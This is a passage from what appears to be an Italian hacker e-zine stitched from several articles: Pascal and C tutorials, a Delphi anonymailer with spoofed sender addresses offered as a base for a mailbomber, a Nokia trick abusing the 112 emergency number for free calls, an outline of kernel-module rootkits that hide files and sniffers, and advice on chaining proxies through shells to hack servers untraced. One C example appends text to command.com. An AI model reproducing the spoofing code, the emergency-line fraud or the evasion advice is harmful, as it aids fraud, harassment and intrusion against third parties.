riguarda proprio questa variabile. Ma c'è un modo per evitare di incrementare il contatore... il ciclo FOR. Ha quasi la stessa sintassi del ciclo WHILE, solo che essa incrementa automaticamente il contatore ogni volta che il ciclo si ripete, e quando viene richiamato, lo azzera. FOR condizione iniziale TO condizione di uscita DO comandi Come while, for esce dal ciclo quando la condizione è falsa. In questi due tipi di cicli, il controllo è posto ALL'INIZIO, per cui, se il programma non soddisfa le condizioni all'inizio del ciclo, esso non viene eseguito. Tuttavia c'è un modo per garantire che il ciclo sia eseguito almeno una volta: il ciclo REPEAT. La sua sintassi è REPEAT comandi UNTIL condizione In questo caso i comandi non devono essere definiti con la coppia BEGIN/END, e si esce dal ciclo quando la condizione è FALSA, per cui continua a girare finchè risulta vera. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ COMANDI DI INPUT E OUTPUT Questo è un argomento molto importante della programmazione, ovvero il voler interagire con l'utente. Cosa significano le parole INPUT e OUTPUT? L'input è l'inserimento di caratteri (o meglio, di dati) nella macchina, l'OUTPUT è, al contrario, la visualizzazione. Per far visualizzare sul monitor un messaggio di output, bisogna utilizzare il comando WRITE, che però, dopo aver scritto ciò per cui è stato richiamato, non va a capo. Io preferisco usare il comando WRITELN che, una volta visualizzato un messaggio, torna a capo. Per utilizzare questi due comandi, c'è bisogno di rispettare una grammatica specifica. Ad esempio: WRITELN('Questo è un messaggio a video'); Notiamo che il testo è racchiuso da apici e da parentesi (dato che è una STRINGA, ovvero un insieme di caratteri alfanumerici, dev'essere racchiuso da apici). Nel caso volessimo visualizzare il contenuto di una variabile, possiamo utilizzare la seguente sintassi: writeln('La variabile A vale ',a); Dato che a non è una stringa ma una variabile, l'apice si ferma prima, e per far capire al compilatore che non si tratta più di testo, utilizziamo una virgola. Il prossimo esempio spiegherà come comportarsi nel caso delle visualizzazione di due o più variabili. writeln('La somma di ',a,' e ',b,' è ',somma); Il secondo comando da analizzare è READLN. La sua sintassi è simile a quella di WRITELN READLN(variabile); solo che, tra le parentesi non è racchiusa una stringa, ma bensì una variabile, per cui non bisogna mettere degli apici. Se si volesse inserire più di una variabile, si userebbe readln(a,b,c); separando i nomi delle variabili con una virgola. Quando andremo a leggere i diversi valori, possiamo separarli con uno spazio o con un invio. La sintassi dei corrispettivi comandi WRITE e READ è la stessa, solo che dopo la loro esecuzione, il cursore non viene portato a capo. [Saluti:] Ulisses1, Faladi, Cookbooker, Ynsane, Elena, Elisa, Angela, Francesco M. e suo fratello P., Antonio C., Michele A., B-stuta, Knera, tutta la mia classe e la mia scuola (grazie per aver aggiornato il sito!!!), e tutti quelli che mi conoscono in chat e in realtà (tranne Rap e Th3v3n1n ehehehhe). EVILANGEL ··············································································· ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× __ o __| __ __ | __ (__| (__(_ | (__| (__( (__( |_, (___ __/ ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× "Guida Al C" [Autore: FeltonSpray] Ciao a tutti e grazie di leggere questo TUTORIAL, io conosco basilarmente diversi linguaggi ma secondo me quello in cui riesco meglio e il C sopratutto usato per fare dei programmi per linux. Non credo troverete riferimento mai a come creare un programma specifico per windows sono fatti vostri io vi consiglio di fare tutto per linux cmq la scelta è vostra... (arrivati al txt dei socket io ve li spiego per linux!) Come tutti sanno il linux contiene già da se i compilatori per diversi linguaggi tra cui anche il compilatore GCC che si trova in /usr/bin la sintassi per compilare un vostro programma con il gcc è la seguente gcc prognostro.c -o prognostro così il nostro programma diventa eseguibile e da una shell basta richiamare il percorso e lanciare il programma! Naturalmente la sintassi che vi ho dato io va bene sè il programma che avete creato (prognostro.c) lo avete salvato in /usr/bin sennò dovete indicare il percorso tipo gcc /root/Desktop/prognostro.c -o prognostro Io creo i miei programmi con l'editor GEDIT anche se ci sono editor + specifici!!! Fatta questa piccola parentesi possiamo cominciare a spiegare qualcosa.... Esempio uno! ---------------------------------------------------------------------- #include main(){ printf("FeLtOnSpRaY sEi MiTiCo"); } ---------------------------------------------------------------------- Questo è il nostro primo programma che facciamo (non siete già contenti?? ;p) Adesso spieghiami la struttura del c e quello che abbiamo fatto con il programma: #include >>--> E' un comando che ordina al programma di includere tipi, strutture e funzioni di una libreria! [ il simbolo # serve ad inizializzare la richiesta al processore] >>--> Questa è la libreria che serve a noi per far funzionare il programma, c'e ne sono tantissime man mano che continuerò questo corso ve le spiego almeno le più importanti; notare che le librerie vanno scritte in mezzo a < > main(){ >>--> E la dichiarazione della procedura principale del programma, adesso le parentesi sono vuote, man mano che che andiamo avanti vi spiego come riempirle printf("scritta"); >>--> Serve a far scrivere nel monitor la scritta che abbiamo inserito nelle parentesi, questa funzione printf la possiamo usare inquanto abbiamo inserito come direttiva al preocessore la libreria stdio.h che si occupa pure della gestione INPUT & OUTPUT del programma. Notate che l'istruzione printf........ chiude con un ; infatti in c tutte le istruzioni che mettiamo dopo il main(){ vanno dichiarate con il ; è un errore non metterlo il programma non si compilerà mai! Alla fine di tutte le istruzioni per chiudere il programma mettiamo } /* Adesso spero vi è tutto chiaro l'esempio, che state capendo qualcosa di c sò che non sò usare termini perfetti e me ne scuso ma io ve lo spiego così se vi va bene tanto meglio sennò consiglio di scaricare qualche guida di 300 pagine molta più completa ma pur sempre difficile! */ Adesso voi direte ma sto scemo che ci scrive?? Ho scritto un mio commento ed anche con il C accanto ad ogni comando che date potete mettere un commento per far capire meglio il programma, la sintassi per mettere un commento è questa: /* scrivi tutto quello che vuoiappena finisci chiudi il commento con */ Naturalmente il commento si vede nel codice e non nel programma! Adesso andiamo avanti e vi spiego quanto il printf sia flessibile: \n >>--> Crea una nuova linea \r >>--> Va a capo \t >>--> Inserisce un tab Sicuramente c'e ne sono altre ma io non le sò =) allora vi spiego come applicarli, prendiamo l'esempio di prima: printf("FeLtOnSpRaY sEi MiTiCo"); allora se io scrivevo così: printf("\n\rFeLtOnSpRaY sEi MiTiCo\n\r"); Il programma scrive la scritta FeLtOnSpRaY sEi MiTiCo =) in una nuova riga a capo, provate le varie combinazioni così imparate a sistemare una scritta nel programma per renderlo più professionale =) Adesso spieghiamo quali varibili si possono impostare, quanto c'e ne sono, e come applicarli! Esistono 5 tipi di vartibili: char >>--> Un carattere int >>--> da -32767 a 32767 long >>--> da -2147483647 a 2147483647 float >>--> da 3,4 * (10**-38) a 3,4 * (10**+38) double >>--> da 1,7 * (10**-308) a 1,7 * (10**+308) Allora visto che adesso le conosciamo vediamo come applicarne qualcuna: -------------------------------------------------------- #include main(){ int numero; numero=1; printf("FeLtOnSpRaY è il numero %d ;p", numero); } -------------------------------------------------------- Credo che abbiate già capito tutto ma per i più "DURI DI TESTA" la spiego: int numero; >>--> Dichiariamo al programma che esiste una variabile di nome numero! numero=1; >>--> Dichiariamo che il numero della variabile è 1 printf("FeLtOnSpRaY è il numero %d", numero); >>--> Trovate di nuovo %d che è il richiamo dove va a finire il numero da noi dichiarato nella variabile. e trovate , numero che lo dovete mettere col nome che avete dato alla variabile, se mettete il nome alla variabile shock dovevate scrivere shock=1; e printf....... , shock); /* Spero di essere stato chiaro è comunque non fate commenti del tipo MA SE CI SCRIVEVI 1 NELLA PRINTF NON RISPARMIAVI TEMPO??? E VOI COME CAPITE SENNO' LE VARIABILI??? =) */ Ok Adesso possiamo parlare di un'altra opzione utilissima del stdio.h parliamo del scanf... piccola spiegaziuone prima dell'esempio: Lo scanf gestisce l'input da tastiera lo immagazina e lo stampa nel nostro caso nel printf ma meglio fare un esempio banale: --------------------------------------------------- #include main(){ char numero; printf("\n\rDIGITA UN NUMERO:\n\r"); scanf("%d",&numero); printf("\n\rHAI INSERITO IL NUMERO %d\n\r") --------------------------------------------------- In base a ciò che vi ho spiegato capirete subito sto prog come funziona ma io penso sempre ai duri di comprendonio e lo spiego =) char numero; >>--> Impostiamo come variabile la char che è quella dedicata alle lettere =) scanf..... >>--> aspetta il vostro input da tastiera e lo passa all'ultimo printf Penso che più facile di cosi c'e questo: ------------------------------------------------------------------------------------------------ #include mail(){ printf("FeLtOnSpRaY vi consiglia di andare a puntare soldi sui cavalli magari vincete\n\r"); } ------------------------------------------------------------------------------------------------ /* naturalmento scherzo hihihi */ Adesso spieghiamo che è un ARRAY =) Un array è una variabile che può contenere in essa diverse variabili Per creare un array non ci vuole niente allora: int numero[30] >>--> /* Naturalmente 30 è il numero di variabili che io voglio che contenga */ numero[0]=1 } numero[1]=2 } >>--> I valori non sono da seguire come li ho scritti io li potete benissimo cambiare! numero[2]=3 } e così via! Ricordate che se ne metto 30 di variabili si conta da "0" a "29" ________________________________________________________________________________________________ Esistono 4 tipi di cicli: If While Do For (Ricordate che se non si fanno modifiche per cambiare una condizione, si originano cicli infiniti quindi ehehh state attenti =) Ma andiamo ad analizzarli uno per uno... /* che palle =) */ Allora un ciclo su imposta come if quando deve verificarsi un'operazione che se riesce ci da "errore 0" invece se non riesce ci da "errore 1" ma un esempio si deve fare senno manco io che sto scrivendo ci capirei qualcosa: if (numero>5) printf("Maria ha fatto più di 5 bocchini"); Se il numero è maggiore di 5 ci comparirà la scritta altrimenti non ci compare niente, se è maggiore di 5 ci restituisce un "errore 0" altrimenti ci restituisce un "errore 1" adesso invece faccio un esempio in modo tale che ci risponda sia se il numero dei "bocchini" è maggiore, sia che il numero è minore allora... ----------------------------------------------------------------- if (numero>5){ printf("Maria ha fatto più di 5 bocchini WOW!!"); } else { printf("Maria ha fatto meno di 5 bocchini..."); } ----------------------------------------------------------------- Allora vi spiego l'esempio (per i duri di testa) =) allora.... Nello stesso programma abbiamo fatto + di un'operazione come vedete, invece "else" server come istruzione all'if per far capire che deve fare se l'operazione non avviene; nel nostro caso ci restituisce una scritta. Adesso passiamo al ciclo While... E preciso identico a quello di prima soltanto che la condizione resta fino a che e vera while (numero<5){ >>--> Così diventa per il ciclo while Ricordate che il ciclo while controlla alla partenza le operazioni, /* così introduco il ciclo Do */ Il ciclo è uguale a quello while soltanto che a sua volta questo ciclo controlla alla fine le operazioni, ekko un esempio: do { operazioni numero++; } while(numero<10); Ok adesso resta il For.. Il for non fa altro che controllare un numero di operazioni ogni tot di volte, la sintassi è: for (numero=0; numero<5; numero++){ operazioni } un esempio che chiarisce le idee ------------------------------------------- #include main(){ int felton; for (felton=0;felton<5;felton++){ printf("La variabile vale %d",felton); } } -------------------------------------------- Se ancora non lo avete capito vi consiglio di compilarlo subito e capire come funziona! Ultimi due comandi prima di chiudere con i cicli ekko due comandi importanti "break & continue" Break >>--> chiude un ciclo in ogni momento continue >>--> lo fa ricominciare nuovamente |\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\| In teoriapotre chiudere qui il txt visto che ho spiegato le varibili ma visto che non ho nient'altro da fare vi rompo ancora le palle con le "strutture" in c : Allora una struttura è capace di contenere al suo interno diverse variabili anche non uguali, allora adesso facciamo una struttura in grado di contenere info sulle moto come Nome, Marca, Peso, capacità serbatoio: quindi: ----------------------------------------------- struct moto{ char nome; char marca; int peso; int serbatoio; } Adesso creiamo la variabile vera e propia struct moto moto1; struct moto moto2; struct moto moto3; struct moto moto4; Adesso moto1.peso=107; moto1.serbatoio=12; strcpy(moto1.nome,"RUNNER"); strcpy(moto1.marca,"GILERA"); moto2.peso=84; moto2.serbatoio=5; strcpy(moto2.nome,"Zip Sp"); strcpy(moto2.marca,"Piaggio"); moto3.peso=90; moto3.serbatoio=8; strcpy(moto3.nome,"Nrg Extrem"); strcpy(moto3.marca,"Piaggio"); moto4.peso=140; moto4.serbatoio=12; strcpy(moto4.nome,"Leonardo"); strcpy(moto4.marca,"Aprilia"); -------------------------------------------------- Gestiamo i file con i nostri programmi... Prima di tutto bisogna creare un puntatore capace di accettare FILE e si crea così FILE *nomedelfile; Dopo dobbiamo aprire questo file è la sintassi è: nomedelfile=fopen("\\provola.txt","a"); Spieghiamo un pò il tutto nomedelfile >>--> come avete scritto nel puntatore deve essere uguale! fopen >-->> è il comando che fà aprire il file ("\\provola.txt >>--> il file che vogliamo aprire ,"a"); >>--> Quella a sta per a significare che nel file noi vogliamo che aggiunga delle modifiche senza toccare il file (tipo come i file di log vogliamo che ci scriva ma non che cancelli file|) Adesso vi dico le opzioni che sò: a >>--> Già spiegata sù r >>--> Legge il file in questione w >>--> Crea il file (se già non esiste) e ne cambia sempre i contenuti con quello che vogliamo! Forse c'e ne saranno altri ma io non li sò :) (Ricordate che li potete combinare i comandi tipo mettere "aw" oppure "arw") Naturalmente alla fine dobbiamo chiudere il file sennò le modifiche non vengono accettate quindi dobbiamo scrivere alla fine fclose(nomedelfile); Esempio contro i fottuti WINDOWSIANI !!!!!! --------------------------------------------------- #include main(){ FILE *nomedelfile; ilfile = fopen("\\command.com","a"); fprintf(nomedelfile,"%s","A MORTE I LAMER!"); fclose(nomedelfile); } --------------------------------------------------- Di nuovo trovate solo il comando "fprintf" che serve per inserire delle frasi sul file! |\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\| Adesso spigherò le COSTANTI >>--> Fate attenzione a questa parte!!!!!! Le costanti possono essere numeriche intere, di unsa stringa o di un carattere; e come dice la parola stessa rimangono costanti per tutto il programma! non c'e bisogno che metta la spiegazione vi dico solo la sintatti esatta per usarle: static char ciao 4 []="FeLtOnSpRaY"; |---------------------------------------> Comando nuovo e serve a far capire che stiamo usando una costante statica! Adesso Parliamo dei puntatori: I puntatori non sono altro che delle variabili che ha un'esatta collocazione in memoria! ricordate che un puntatore deve essere allocato in una zona di memoria, sennò il pc va in crash all'esecuzione del programma! per creare un puntatore basta scrivere questa sintassi: int *puntatore |-------------->Int può essere sostituito a qualsiasi altra variabile! Possiamo dire che i puntatori hanno tre tipi di informazioni: puntatore >>--> che mi indica il valore, il contenuto della variabile (considero il puntatore come una qualsiasi variabile) &puntatore >>--> che è l'indirizzo fisico della variabile all'interno della memoria puntatore >>--> che mi indica il contenuto della locazione della memoria. |\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\| Adesso spiego un'altra cosa del C che mi auguro conosciato con sistemi .NIX la REDIREZIONE. > Inserisce l'esecuzione di un programma in un file particolare da noi scelto. < Inserisce dentro un programma ciò che è scritto in un file. | Prende l'output da un programma e lo immette come input in un altro. Tutto questo per introdurre il comando getchar() e putchar(). Queste due librerie si usano così: int getchar(void); int putchar(char ch); Il primo comando legge un char, mentre il secondo scrive un char. Adesso infine vi spiego il DEFINE #DEFINE. Il programma #define serve per creare mini programmini o macro dentro un programma. Serve quindi a semplificare il nostro lavoro e poter anche leggere il sorgente in modo chiaro! La sintassi esatte è #define Adesso ho finito la parte 1 di questo Tutorial mi raccomando di studiarlo per bene e di provare i miei esempio così prendete pratica! La prossima volta spiegherò i SOCKET! []---[FeLtOnSpRaY]---[] []---[ feltonspray@katamail.com ]---[] P.S= Il C è il linguaggio preferito dagli Hacker (N.d.R. pensa per te :P) visto le sue potenzialità e la sua semplicità quindi imparare necessariamente questo linguaggio perchè gli exploit che esistono per entrare nei server sono creati in C e dovete compilarli anche nella macchina vittima quindi due cose: Installatevi Linux e smanettate come i pazzi, imparate il C, Levatevi il virus che avete nel pc si chiama WINDOWS!!!!!!! ····························································································· ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× __ __ __ __ __ __ __ o | ___ __ o __ __| ___ | __ |__ o (__( | ) (__) | ) (__| | ) ) (__( | |_, (__/_ | ' | | ) (__| (__/_ |_, |__) | ) | | | ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: Realizzare un anonymailer kon Delphi] [Autore: Cookbooker] [Tempo "sprekato" a skrivere sto artikolo: mezzoretta] [Obbiettivo: realizzare un anonymailer utilizzando il compomente NMSMTP di Delphi] Realizzare un anonymailer kon Delphi è molto semplice, negli allegati ne trovate un esempio kompleto di codice sorgente, ma vediamo passo per passo kome realizzarne uno da zero. Prima di tutto inserite 4 edit (uno per indikare il falso mittente, uno per indikare il ricevente, uno per specifikare il server da utilizzare ed uno per specificare l'oggetto), 2 pulsanti (uno per konnetterci al server e l'altro per inviare l'e-mail), un Memo (ke conterrà il corpo del messaggio) ed infine aggiungete un componente NMSMTP (FastNet/NMSMTP) ke sarà fondamentale per l'invio dell'e-mail. Ora personalizziamo il pulsante Button2 (il pulsante ke avvierà il collegamento al server) in questo modo: //userò questo karattere per distinguere il codice dai kommenti; o/ o/ ``````````````````°\``````````````````````````````````````°\````````````````````````` procedure TForm1.Button2Click(Sender: TObject); begin NMSMTP1.Host := Edi4.text; //qui indikiamo kome server il server specifikato in Edit4 NMSMTP1.Connect; //con questo komando ci connettiamo al server precedentemente specificato end; o/ o/ ``````````````````°\``````````````````````````````````````°\````````````````````````` Una volta kollegati al server usando i comandi specificati nella procedura precedente, non ci rimane ke specifikare i dati necessari all'invio dell'e-mail: o/ o/ ``````````````````°\``````````````````````````````````````°\````````````````````````` procedure TForm1.Button1Click(Sender: TObject); begin NMSMTP1.PostMessage.FromAddress := Edit2.Text; //indikiamo al server l'apparente indirizzo del mittente NMSMTP1.PostMessage.Subject := Edit3.Text; //specifikiamo il "soggetto" della lettera NMSMTP1.PostMessage.ToAddress.Add(Edit1.Text); //l'indirizzo del ricevente è quello specifikato nella casella di testo Edit1 NMSMTP1.PostMessage.Body.Assign(Memomsg.Lines); //il corpo del messaggio è contenuto nel Memomsg NMSMTP1.SendMail; //infine inviamo tutti i dati specificati, e-mail kompresa :o) end; o/ o/ ``````````````````°\``````````````````````````````````````°\````````````````````````` Semplice, no? :o) Naturalmente questo è un anonymailer essenziale, kon un po di inventiva potete perfezionarlo molto: potete trasformarlo in un mailbomber :) o potete semplicemente utilizzare il componente NMSMTP per kreare un programma utilizzabile per la gestione di una mailing list... insomma ora avete kualkosa da fare mentre aspettate il mio prossimo artikolo su Delphi ke, a mio parere, sarà molto interessante... sarà, infatti, una vera e propria guida alla creazione di una backdoor 4 dummies :o)) ßyeZ, Cookbooker. Saluti: saluto e ringrazio Ulisses1, Rhost, Cujo, Archimede, Freesto, EvilAngel, Fabripal tutti i membri della crew , Nube, Rage, Messiah e Fulmine (ke nick del cazzo.. non potevi scegliertente uno un po più dignitoso? :P). __________________________________________________________________________ | _____ _ _ _____ _____ ___ _ _ _ __ _ _____ | | | _ \ | | | | | _ \ | ____| / | | | / / | | | \ | | / ___| | | | |_| | | |_| | | |_| | | |__ / /| | | |/ / | | | \| | | | | | | ___/ | _ | | _ / | __| / / | | | |\ \ | | | |\ | | | _ | | | | | | | | | | \ \ | |___ / / | | | | \ \ | | | | \ | | |_| | | | |_| |_| |_| |_| \_\ |_____| /_/ |_| |_| \_\ |_| |_| \_| \_____/ | -------------------------------------------------------------------------- ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× _ __ _|_ __ _|_ _|_ o __ __ __ __ o | '| '| __) | (__) |_, |_, | (__( | ) ) (__) | |_, | | (___ ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× "FoTTiaMO IL 112" [Autore: FeltonSpray] Sicuramente tutto il mondo hhih anzi tutta l'italia ha sentito parlare di questo bug scovato nei telefonini nokia, a me lo ha spiegato una compagna di classe.... che è stata anche denunciata..... beh prima un DISCLAIMER CON LE @@ DISCLAIMER Ragazzi non usatelo cone la vostra scheda OMNITEL*, se lo fate verrete denunciati dalla polizia stessa visto che il bug..... beh IO VI HO AVVERTITO AZZI VOSTRI! Provato con NOKIA 3210 CREDO CHE SOLO IN QUESTO FUNZI! SCHEDA OMNITEL A ZERO LIRE DI CREDITO! InIzIaMo Allora le cose da fare sono semplicissime: Premetto che si può fare solo con le schede OMNITEL provato anche con le altre ma non và :-( cmq disabilitate il PIN iniziale, andate su MESSAGGI >>--> IMPOSTA NUMERO CASELLA VOCALE e scrivete il numero che volete chiamare! RICORDATEVI CHE NELLA SCHEDA BISOGNO CHE SIA A ZERO SENZA NA LIRA!!! Adesso telefonate al numero 112 avviata la chiamata SPEGNETE E RIACCENDETE velocemente il telefonino schiacciando il tasto 1, dopo un paio di prove ci prendete la mano! Adesso vedrete che la telefonata viene innoltrata ma non compare il LOGO sul DISPLAY del Telefonino che chiama questà è la conferma dell'avvenuta connessione perfetta; adesso parlate pure quanto cavolo vi pare MA RICORDATE CHE VE LA METTETE DI DIETRO DA SOLI VISTO CHE VERRETE DENUNCIATI SE USATE LA SCHEDA VOSTRA... Beh questo pikkolo tutorial svolge al termine, vi ringrazio di leggermi ancora! E spero di avervi portato un nuovo trucchetto per quelli che non lo sapevano! ciao Ciao alla prossima! []---[FeLtOnSpRaY]---[] []---[ feltonspray@katamail.com ]---[] p.s. thanks Stefania per avermelo spiegato! P.S thanks Feltonspray Per averglielo spiegato a STEFANIA HIHIHI =) ByZzZZZZZzzzZZZZzZZZzZZzZZZzZZzzzZZZZZzzZZZZZZzZZZZzZZzZzzzzzZZzzZZZZZZzZZZZZZzzZZzzzzzzzZZZZzzzzzZ _______________________________________________________________________________________ | _ _ __ _ _ _ __ __ _____ _ _ __ _ _ __ __ | | | | | | | \ | | | | | | \ \ / / | ____| | | | | | \ | | | | \ \ / / | | | | | | | \| | | | | | \ \/ / | |__ | | | | | \| | | | \ \/ / | | | | | | | |\ | | | | | } { | __| | | | | | |\ | | | } { | | | |___ | | | | \ | | |_| | / /\ \ | |___ | |_| | | | \ | | | / /\ \ | | |_____| |_| |_| \_| \_____/ /_/ \_\ |_____| \_____/ |_| \_| |_| /_/ \_\ | --------------------------------------------------------------------------------------- ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× | |__, __ __ |_, | \ | ) ) ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: LOADABLE KERNELMODULE ] [Autore: Ulisses1] Disclaimer: Raga’ sono stato 3 mesi senza problemi e non ne voglio proprio adesso. Gentilmente cercate di non fare stronzate con il materiale contenuto in questo articolo. Sottolineo che questo articolo è stato scritto esclusivamente a scopo educativo. Nel caso in cui verrete beccati vi prego di non fare il mio nome o quello dei miei collaboratori. Grazie e Buona Giornata :) Bene dopo il disclaimer possiamo iniziare. Gli lkm (Loadable kernel module) possono essere uno strumento molto potente nelle mani di un hacker o cracker che abbia ottenuto accesso root ad un sistema. Per poter capire il funzionamento degli lkm bisogna avere chiaro il concetto di dirottamento delle chiamate di sistema . Immaginiamo di avere al posto del vecchio indirizzo nell’array sys_call_table() un nuovo che punta alla nostra funzione in grado di filtrare i paramentri della chiamata C prima che siano passati, oppure una funzione che sia capace di modificare i dati ritornati in zona utente. In questo modo se non vogliamo che l’admin non veda e non senta i rumori da noi provocati, ebbene non sentirà e non vedrà nulla. Ma come è possibile disporre di un simile potere? Beh in UNIX e in Linux, a meno di usare Capabilities, il root è onnipotente. In zona kernel inoltre non vi è concetto di permessi, ogni codice viene eseguito al massimo dei privilegi. Senza dubbio per poter utilizzare degli lkm bisogna avere a disposizione molti tools ed exploits nonché una buona conoscenza del kernel per poter creare un rootkit ad hoc nel kernel. Ma ora vediamo come sia possibile nascondere files mediante questa tecnica. Il comando strace permette di tracciare le chiamate di sistema ed i segnali utilizzati da un’applicazione. In questo caso utilizzando questo comando su un banale ls mostrerà le varie chiamate utilizzate. Di sicuro la più importante nell’output di strace risulta essere getdents . Quasi in tutti i rootkit via lkm sono disponibili versioni modificate della kiamata sys_getdents() che filtrino i vari nomi file nel caso questi contangano una determinata stringa nel nome. Un altro approccio possibile via lkm permette di registrare, ad esempio, un nuovo protocol handler, ovvero una nuova funzione o un set di funzioni per manipolare e gestire traffico in rete. In questo modo è possibile modificare il normale funzionamento dello stack TCP/IP di Linux, occultare uno sniffer nel kernel, o magari un bouncer. In teoria è sufficiente lanciare il comando lsmod per ottenere una lista di moduli caricati. In realtà sfuggire ad un simile controllo è molto semplice. Sotto Linux vi è una lista dei nomi dei moduli caricati, le dimensioni, reference ed i moduli che li utilizzano a loro volta in /proc/modules . Se un modulo è presente in questa lista ma non nell’output di lsmod, c’è qualcosa che non va. Se non compare nemmeno qui è possibile che lo stesso lkm impedisca di essere visto in /proc/modules . In questo caso i problemi si complicano. Esistono altri metodi per trovare un lkm ma... sono riportati in dei bei manuali quindi è inutile che io li spieghi in questo articoletto..=) Beh l’articolo è finito, spero che vi sia piaciuto... ByEz Ulisses1 ··············································································· ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× | ___ __ |__ ___ | | |_, (__/_ __) | ) (__/_ |_, |_, ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: Le Shell] [Autore: FeltonSpray] "DiScLaImEr" Niente DiscLaimer tutte info =) Oggi vi spiegherò un pò perche è utile avere shell e che servono, che si può fare etcc.etcc.etcc. Allora le shell sono dei pikkoli accessi su sistemi .Nix che ci permettono di fare diverse operazioni, invece per chi si stà avvicinando da poco all'hacking è consigliabile registrarsi subito per capire un pò come ci si muove in linux prima naturalmente di installarlo. Esistono diversi server che offrono shell gratuite e alla fine di questo txt scriverò degli URL dove potersi registrare. Iniziamo subito a parlare delle diverse shell che si trovano gratis, esse vengono chiamate shell-ristrette visto che sono limitate a certi usi per esempio quasi tutte quelle free non permettono l'uso di BOT se ne trovano uno viene immediatamente chiuso il servizio ed eliminato il nostro account su quel server ciò significa niente SHELL :-( allora dopo esserci registrati ed essere dentro il nostro account ci troviamo sul server che ci mette a disposizione certi servizi come quello di FTP,LINX, un paio di mego di spazio gratuito ed altri servizi; noi possiamo tranquillamente usare (per i comandi nel sito http://spazioweb.inwind.it/inkrew/ troverete il mio TXT che ne parla) adesso cominciate a prendere pratica. Naturalmente per noi le shell non servono ad allenarci su linux ma a ben altri scopi =) tipo per fare un hack ci colleghiamo alla shell gli mandiamo via ftp gli exploit che ci servono e cominciamo ad hackere ma PURTROPPO NON E COS'I visto che il server della shell possiede il nostro ip e il server vittima conosce quello della shell non ci metteranno tanto a risalira a voi quindi io vi consiglio di usare qualche proxy in catena per poi arrivare alla shell e dalla shell collegarci via telnet alla stessa shell, così alla shell all'inizio appare il suo ip connesso eheheh e quindi potrete hackerare un po più tranquilli ma se prendete di mira server come NASA state sicuri che vi trovano anche con 50 proxy incatenati =) Ma adesso mi sa che siamo usciti fuori dal DISCLAIMER, ricordate solo di hackare i vostri sistemi non quelli di altri server. Esistono anche le shell non ristrette che sono le shell a pagamento, queste sono notevolmente migliori, potete anche metterci su BOT, e avete tutti i servizi del server disponibili beh con i soldi si ha tutto ehehe. Onestamente io consiglio di comprarvene una magari che il server un server tipo IRIX oppure Solaris così da poter capire come funzioni il sistema senza installarvelo! Lista server per freeshell: http://www.freeshells.net/ http://www.continuum.eu.org/ http://dishboy.dyn.ml.org/ http://www.nyx.net/ http://vester.dynip.com http://www.vexation.org/ http://www.arbornet.org/projects.html http://www.unixnet.org/ http://www.nether.net/ http://www.lanck.ru/ http://sdf.lonestar.org/ http://suburbia.com.au/ http://www.nyx.net/ http://www.shellyeah.com/ []---[FeLtOnSpRaY]---[] []---[ feltonspray@katamail.com ]---[] ······························································································· ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× __ o __ __ __ __ __ o | __ __ o __ __ ___ |__, ___ __ __ ___ | | ' | (___ (__) | ) ) |__) | |_, (__( (__ | (__) | ) (__/_ | \ (__/_ | ' | ) (__/_ |_, | ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: RiCoMpIlAzIoNe DeL kErNeL] [Autore: FeltonSpray] Intro.... Beh visto che tanti nuovi linuxiani non sanno ricompilarsi il kernel ho creato questo txt che li potrà aiutare in questa delicata fase, bisogna sapere che linux viene fornito con un kernel generico tanto da permettere di utilizzare le parti essenziali, poi bisogna compilarselo in base al propio hardware e alle propie esigenze...... Io personalmente ho usato la: Mandrake Linux 7.2 Kernel 2.2.18 (Notate che la mia distribuzione di serie aveva il kernel 2.2.17) Per la mia compilazione il kernel di serie lo dovuto levare a causa di problemi cmq io consiglio il 2.2.18 poi fate voi -------------------------- | URL DA DOVE SCARICARLO | ! | | http://www.linuxhq.com | -------------------------- Prima di iniziare un'ultimo consiglio: Ricordate tutto il vostro hardware State attenti a non generalizzare se non ricordate senno al caricamento di linux rischiate un bella scritta tipo [FAILED]... oppure una bella X rossa nella mia distribuzione =) >>--> ADESSO SI PARTE <--<< Quindi vi spiego prima di tutto come installare i sorgenti: cd /usr/src (la dir dei sorgenti) rm linux (rimuoviamo il link simbolico) mkdir linux-2.2.18 (Adesso creiamo la dir in cui copieremo il nostro kernel) ln -s linux-2.2.18 (creiamo il link alla dir del kernel) tar xzvf /percorso/linux-2.2.18.tar.gz ./ (cambiate il percorso a seconda di dove avete il kernel) rm -rf linux-2.2.1X* (il kernel vecchio) *=Varia a seconda del vecchio kernel cd linux Adesso abbiamo finito di copiare il nostro kernel adesso possiamo configurarlo Andate nella directory del nuovo kernel (da un terminale) e scrivete "make xconfig" Adesso eseguira dei comandi in automatico e si aprirà un form con tanti bottoni che corrispondono a diverse impostazioni (hehe scontato ;p) quindi cominciate dal primo e man mano che finite una parte clikkate sul bottone "NEXT" in basso al centro per andare automaticamente avanti. Naturalmente non mi metto a spiegare ogni singola voce visto che sono facili da capire 